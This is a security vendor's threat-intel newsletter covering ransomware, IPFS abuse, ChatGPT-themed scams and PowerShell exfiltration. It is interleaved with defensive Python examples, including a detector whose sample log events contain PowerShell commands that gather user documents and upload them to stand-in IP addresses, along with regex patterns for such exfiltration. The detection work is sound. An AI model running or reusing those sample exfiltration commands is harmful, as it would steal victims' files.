Unit 42 Threat Intel Bulletin - June


Cybersecurity Trends


Read the Unit 42 Cloud Threat Report, Volume 7 to learn from real cloud breaches that happened in 2022.

Register for our virtual Code to Cloud Cybersecurity Summit.


Unit 42 Threat Intel Blogs


Attack Surface Risks, Challenges and Changes (Attack Surface Management)

While digitization has simplified many organizational tasks, it has simultaneously made other facets of business more complex, including an ever-growing attack surface. As the number of connected devices and online services continues to grow, identifying all of these assets and potential vulnerabilities is a challenge. Implementing effective security measures becomes more difficult, especially if you are relying on manual inventory processes.

What to know


Unit 42 Unveils Most ‘Expansive’ Cloud Threat Research Yet: Cloud Threat Report Volume 7 Examines the Expanding Attack Surface (Cloud, Reports)

The cloud attack surface is as dynamic as the cloud itself. As organizations around the globe increasingly share, store and manage data in the cloud, this expands organizations’ attack surface exponentially. This expansion often happens in ways that are unknown, overlooked or improperly secured. For threat actors, each workload in the cloud presents an opportunity, and without proper management, organizations are exposed to risk in countless ways.

Key findings


Network Security Trend: November 2022-January 2023 (Malware)

Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:

  • Roxy-WI, a web interface for managing and monitoring HAProxy, Nginx, Apache and Keepalived servers
  • CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
  • Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications

Expand your knowledge


Teasing the Secrets from Threat Actors: Malware Configuration Parsing at Scale (Malware)

Configuration data that changes across each instance of deployed malware can be a gold mine of information about what the bad guys are up to. The problem is that configuration data in malware is usually difficult to parse statically from the file, by design. Malware authors know its intelligence value, since the configuration carries the directives for how the malware should behave, so they typically obfuscate or encrypt it.
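The kind of extractor the paragraph has in mind, as an added example that is not Unit 42's tooling and not any real family's format: a toy config layout (a "CFG0" marker, a 16-bit length, then a single-byte XOR-encoded "key=value;..." string) is assumed, the samples are constructed inline, and the key is recovered from the known plaintext prefix "c2=" rather than read from the file. The point is the scale step: one parser run over a corpus turns per-build differences (C2, campaign tag, sleep interval) into structured intelligence.

```python
import struct
from typing import Dict, Optional

# Constructed toy layout, not any real family's format (assumption for this example):
#   MAGIC "CFG0" | u16 little-endian length | length bytes XOR-encoded with a single-byte key
# The plaintext is "key=value;key=value;..." and every build starts it with "c2=".
MAGIC = b"CFG0"
KNOWN_PREFIX = b"c2="


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_sample(config: str, key: int, padding: bytes) -> bytes:
    """Embed an encoded config inside junk bytes; used here only to construct test input."""
    enc = xor(config.encode(), key)
    return padding + MAGIC + struct.pack("<H", len(enc)) + enc + padding[::-1]


def recover_key(encoded: bytes) -> Optional[int]:
    """Derive the single-byte key from the known plaintext prefix, then verify every prefix byte."""
    if len(encoded) < len(KNOWN_PREFIX):
        return None
    key = encoded[0] ^ KNOWN_PREFIX[0]
    return key if xor(encoded[: len(KNOWN_PREFIX)], key) == KNOWN_PREFIX else None


def extract_config(sample: bytes) -> Optional[Dict[str, str]]:
    """Scan for the marker, validate the blob behind it, decode and parse it. None if absent."""
    off = sample.find(MAGIC)
    while off != -1:
        hdr = off + len(MAGIC)
        if hdr + 2 <= len(sample):
            (length,) = struct.unpack_from("<H", sample, hdr)
            enc = sample[hdr + 2 : hdr + 2 + length]
            key = recover_key(enc)
            if key is not None and len(enc) == length:
                text = xor(enc, key).decode("ascii", errors="replace")
                pairs = (p.split("=", 1) for p in text.split(";") if "=" in p)
                return {k.strip(): v.strip() for k, v in pairs}
        off = sample.find(MAGIC, off + 1)  # the marker can also occur in junk; keep scanning
    return None


def parse_corpus(samples: Dict[str, bytes]) -> Dict[str, Dict[str, str]]:
    """Run extraction across many samples; the per-build differences are the intelligence."""
    out = {}
    for name, blob in samples.items():
        cfg = extract_config(blob)
        if cfg is not None:
            out[name] = cfg
    return out


# Constructed samples: same toy "family", different per-build config, key and surrounding bytes.
# sample_b deliberately carries a false "CFG0" inside its junk to exercise the re-scan path.
SAMPLES = {
    "sample_a": build_sample("c2=203.0.113.10:443;campaign=q2-fin;sleep=30", 0x5A, b"\x90" * 16 + b"junk"),
    "sample_b": build_sample("c2=evil.example.net:8443;campaign=q2-edu;sleep=60", 0xC3, b"\x00" * 8 + b"CFG0x"),
    "clean_file": b"hello world, nothing embedded here",
}

if __name__ == "__main__":
    for name, cfg in parse_corpus(SAMPLES).items():
        print(name, cfg)
```

The validation step (recover the key, then check that the whole known prefix decodes) is what keeps a marker that happens to appear in unrelated bytes from producing garbage output; a real extractor would add a family-specific check such as a length sanity bound or a checksum where the format has one.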

Learn more


Threat Assessment: Royal Ransomware (Ransomware, Threat Briefs)

Royal ransomware has been involved in high-profile attacks against critical infrastructure, especially healthcare, since it was first observed in September 2022. Bucking the popular trend of hiring affiliates to promote their threat as a service, Royal ransomware operates as a private group made up of former members of Conti.

Find out more


Chinese Alloy Taurus Updates PingPull Malware (Malware)

Unit 42 researchers recently identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.

Discover the details


Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More (Malware)

From July-December 2022, Unit 42 researchers observed and analyzed over 67 million unique malicious URLs, domains and IPs, which we use to block associated malicious network traffic. We cover the trends observed during the second half of 2022 based on those detections of malicious URLs, domains and IPs.

Learn the trends


Threat Actors Rapidly Adopt Web3 IPFS Technology (Malware)

During 2022, analysts from Unit 42 observed the rampant adoption of the InterPlanetary File System (aka IPFS) being used as a vehicle for malicious intent. IPFS is a Web3 technology that decentralizes and distributes the storage of files and other data into a peer-to-peer network.
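One practical consequence of IPFS hosting is that the same content is reachable through many public gateways and through the ipfs:// scheme, so blocking by URL or hostname misses mirrors. The following added example (not Unit 42's code) normalizes observed URLs to their content identifier (CID) so that one blocklist entry covers every gateway. The CID check is a simplified regex for CIDv0 (base58, "Qm" prefix) and base32 CIDv1 ("b" prefix); it does not decode multibase or multihash, and the URLs and the blocklist are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# Simplified CID shapes (assumption: no multibase decoding, just the two common encodings).
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
CID_RE = re.compile(rf"^(?:Qm{BASE58}{{44}}|b[a-z2-7]{{50,}})$")


def is_cid(s: str) -> bool:
    return CID_RE.match(s) is not None


def extract_cid(url: str) -> Optional[str]:
    """Return the CID for ipfs://, path-gateway and subdomain-gateway URLs, else None."""
    u = urlsplit(url.strip())
    if u.scheme == "ipfs":                      # ipfs://<cid>/path
        cand = u.netloc or u.path.lstrip("/").split("/", 1)[0]
        return cand if is_cid(cand) else None
    labels = (u.hostname or "").split(".")      # hostname is lowercased by urlsplit
    if len(labels) >= 3 and labels[1] == "ipfs" and is_cid(labels[0]):
        return labels[0]                        # subdomain gateway: <cid>.ipfs.<gateway>
    parts = u.path.split("/")
    if len(parts) >= 3 and parts[1] == "ipfs" and is_cid(parts[2]):
        return parts[2]                         # path gateway: https://<gateway>/ipfs/<cid>/...
    return None


def triage(urls: List[str], blocked_cids: Set[str]) -> Dict[str, Dict[str, List[str]]]:
    """Group URLs by CID and report which groups match a CID blocklist."""
    by_cid: Dict[str, List[str]] = {}
    for url in urls:
        cid = extract_cid(url)
        if cid:
            by_cid.setdefault(cid, []).append(url)
    blocked = {cid: hits for cid, hits in by_cid.items() if cid in blocked_cids}
    return {"by_cid": by_cid, "blocked": blocked}


# Constructed observations: two CIDs, each seen via two different access methods.
CID_V0 = "QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG"
CID_V1 = "bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi"
OBSERVED = [
    f"https://ipfs.io/ipfs/{CID_V0}/login.html",
    f"ipfs://{CID_V0}",
    f"https://{CID_V1}.ipfs.dweb.link/index.html",
    f"https://cloudflare-ipfs.com/ipfs/{CID_V1}/",
    "https://example.com/ipfs/notacid",
    "https://example.com/login",
]
BLOCKLIST = {CID_V1}

if __name__ == "__main__":
    result = triage(OBSERVED, BLOCKLIST)
    for cid, hits in result["blocked"].items():
        print(cid, "->", len(hits), "mirror URL(s) blocked")
```

Grouping by CID also gives an analyst a quick pivot: a phishing kit re-uploaded with one changed byte gets a new CID, but a kit simply re-advertised through another gateway does not.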

Who are these threat actors


ChatGPT-Themed Scam Attacks Are on the Rise (Malware)

Unit 42 researchers are monitoring the trending topics, newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
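A minimal version of the squatting-domain check described above, as an added example (not Unit 42's detection logic): a list of newly registered domains, constructed inline, is scored against the brand terms "chatgpt" and "openai" for combosquats (brand term plus extra words), lookalikes (the bare brand term on a TLD the brand does not own) and typosquats (one edit or adjacent transposition away from the term). The brand-term list, the allowlist of legitimate domains and the "second label is the registrable label" simplification are assumptions for the example.

```python
import re
from typing import Dict, List, Optional

BRAND_TERMS = ("chatgpt", "openai")                 # assumption: the brand being impersonated
LEGIT_DOMAINS = {"openai.com", "chat.openai.com"}   # assumption: known-good allowlist


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions cost 1."""
    rows = [list(range(len(b) + 1))]
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = min(rows[-1][j] + 1, cur[j - 1] + 1, rows[-1][j - 1] + (ca != cb))
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cost = min(cost, rows[-2][j - 2] + 1)
            cur.append(cost)
        rows.append(cur)
    return rows[-1][-1]


def classify(domain: str) -> Optional[str]:
    """Return 'legit', 'lookalike', 'combosquat', 'typosquat' or None for a domain name."""
    d = domain.lower().strip(".")
    if d in LEGIT_DOMAINS or any(d.endswith("." + legit) for legit in LEGIT_DOMAINS):
        return "legit"
    labels = d.split(".")
    if len(labels) < 2:
        return None
    # Registrable label with separators removed, and everything left of the TLD squashed
    # together so "chatgpt.openai.com.evil-login.net" still surfaces the brand term.
    sld = re.sub(r"[^a-z0-9]", "", labels[-2])
    everything = re.sub(r"[^a-z0-9]", "", "".join(labels[:-1]))
    if sld in BRAND_TERMS:
        return "lookalike"
    if any(term in everything for term in BRAND_TERMS):
        return "combosquat"
    if any(osa_distance(sld, term) == 1 for term in BRAND_TERMS):
        return "typosquat"
    return None


def scan(domains: List[str]) -> Dict[str, str]:
    """Map each suspicious domain to its category; legitimate and unrelated domains are dropped."""
    out = {}
    for dom in domains:
        cat = classify(dom)
        if cat not in (None, "legit"):
            out[dom] = cat
    return out


# Constructed newly-registered-domain feed for the example.
NEW_DOMAINS = [
    "chat-gpt-login.com",
    "chatgtp.com",
    "chat-gpt.xyz",
    "openia.com",
    "chatgpt.openai.com.evil-login.net",
    "chat.openai.com",
    "weather.example.org",
]

if __name__ == "__main__":
    for dom, cat in scan(NEW_DOMAINS).items():
        print(f"{cat:11s} {dom}")
```

The ordering of the checks matters: the lookalike test runs before the combosquat test so that "chat-gpt.xyz" is not reported as a combosquat of itself, and the edit-distance test runs last and only on the registrable label, because running it over the squashed full name would match far too much.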

Discover valuable insights


Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land (Ransomware)

During a recent incident response (IR) engagement, the Unit 42 team identified that the Vice Society ransomware gang exfiltrated data from a victim network using a custom built Microsoft PowerShell (PS) script. We’ll break down the script used, explaining how each function works in order to shed light on this method of data exfiltration.
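The defensive counterpart to the technique described above, as an added example (not Unit 42's analysis and not the script they recovered): a heuristic run over PowerShell script block logging (Windows Event ID 4104) that flags blocks combining recursive file enumeration with an HTTP upload primitive, and raises severity when the block also filters for document types or stages an archive. The indicator patterns and the four sample events are constructed for the example; the thresholds are an assumption to tune against your own baseline.

```python
import re
from typing import Dict, List

# Indicator groups (assumption: a starting set, not an exhaustive signature).
# A block must hit "enumerate" AND "send" to be reported; "select_docs"/"stage" raise severity.
INDICATORS = {
    "enumerate": [
        r"\bGet-ChildItem\b.*-Recurse", r"\bgci\b.*-Recurse", r"\bls\b.*-Recurse",
        r"\[System\.IO\.Directory\]::(EnumerateFiles|GetFiles)\(",
    ],
    "select_docs": [
        r"\.(docx?|xlsx?|pptx?|pdf|pst|kdbx)\b", r"-Include\s+\*\.", r"-Filter\s+\*\.",
    ],
    "send": [
        r"\bInvoke-WebRequest\b.*-(Method\s+Post|InFile|Body)",
        r"\b(iwr|Invoke-RestMethod|irm)\b.*-(Method\s+Post|InFile|Body)",
        r"Net\.WebClient\b.*\.Upload(File|Data|String)\(",
        r"HttpClient\b.*\.(PostAsync|PutAsync)\(",
    ],
    "stage": [r"\bCompress-Archive\b", r"\[System\.IO\.Compression\.ZipFile\]::CreateFromDirectory"],
}


def analyze_block(text: str) -> Dict[str, List[str]]:
    """Return the indicator groups that fire on one script block, with the patterns that matched."""
    hits: Dict[str, List[str]] = {}
    for group, patterns in INDICATORS.items():
        matched = [p for p in patterns if re.search(p, text, re.IGNORECASE | re.DOTALL)]
        if matched:
            hits[group] = matched
    return hits


def detect(events: List[Dict]) -> List[Dict]:
    """Evaluate 4104-style events; emit a finding only when enumeration and upload co-occur."""
    findings = []
    for ev in events:
        hits = analyze_block(ev["script_block"])
        if "enumerate" in hits and "send" in hits:
            severity = "high" if ("select_docs" in hits or "stage" in hits) else "medium"
            findings.append({"record_id": ev["record_id"], "host": ev["host"],
                             "severity": severity, "groups": sorted(hits)})
    return findings


# Constructed sample events (script_block is what Event ID 4104 carries as ScriptBlockText).
SAMPLE_EVENTS = [
    {"record_id": 1001, "host": "ws-finance-07", "script_block": r"""
$files = Get-ChildItem -Path C:\Users -Recurse -Include *.docx,*.xlsx,*.pdf -ErrorAction SilentlyContinue
foreach ($f in $files) {
  Invoke-WebRequest -Uri http://203.0.113.45/upload -Method Post -InFile $f.FullName -UseBasicParsing
}
"""},
    {"record_id": 1002, "host": "srv-app-02", "script_block": r"""
Get-ChildItem -Path 'C:\Program Files' -Recurse -Directory | Select-Object FullName | Export-Csv C:\Temp\dirs.csv
"""},
    {"record_id": 1003, "host": "ws-hr-11", "script_block": r"""
Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi
Start-Process msiexec.exe -ArgumentList '/i C:\Temp\agent.msi /qn'
"""},
    {"record_id": 1004, "host": "ws-legal-03", "script_block": r"""
$wc = New-Object System.Net.WebClient
foreach ($f in (gci $env:USERPROFILE -Recurse -File)) { $wc.UploadFile('http://198.51.100.7/up', $f.FullName) }
"""},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Events 1002 (inventory only) and 1003 (download cradle, no upload) do not fire, which is the point of requiring both halves: either primitive alone is everyday administration, and it is the pairing inside one script block that is rare on a workstation.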

Uncover the story


Threat Roll-up

  • (ATT&CK) ATT&CK v13 is out! MITRE has a new blog post talking about feature improvements. (Source: MITRE)
  • (Ransomware) Colleges and schools across US dealing with ransomware incidents, cyberattacks. (Source: TheRecord[.]media)
  • (Cyber Wins) 288 dark web vendors arrested in major marketplace seizure. (Source: Europol)
  • (Artificial Intelligence) Artificial intelligence pioneer Geoffrey Hinton, referred to by some as the Godfather of A.I., leaves Google over risks of emerging tech. (Source: TechSpot)
  • (Artificial Intelligence) White House Pushes Tech C.E.O.s to Limit Risks of A.I. (Source: The New York Times)
  • (Supply Chain Compromise) Analysis | Years after discovery of SolarWinds breach, Russian hackers could be struggling. Officials detailed their response to the hack at the RSA Conference in San Francisco. (Source: Washington Post)
  • (APT) Chinese hackers outnumber FBI cyber staff 50 to 1, bureau director says. (Source: CNBC)
  • (Cybercrime) The cybercriminal gang LockBit has now set its sights on Apple products after having developed its first ransomware for Macs. (Source: Digital Trends)
  • (Malware) Enterprise networks are being targeted by a sneaky new malware. Russian "Pupy" is after corporate networks in the West. (Source: TechRadar)


More Information


Under Attack?

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team by filling out this form or calling: North America Toll-Free: 1.866.486.4842 (866.4.UNIT42), UK: +44.20.3743.3660, EMEA: +31.20.299.3130, APAC: +65.6983.8730, and Japan: +81.50.1790.0200.

If you have cyber insurance or legal counsel, you can request for Unit 42 to serve as your incident response team. Unit 42 is on over 70 cyber insurance panels as a preferred vendor.

KRISHNAN N NARAYANAN

Sales Associate at American Airlines

1 year

Great opportunity
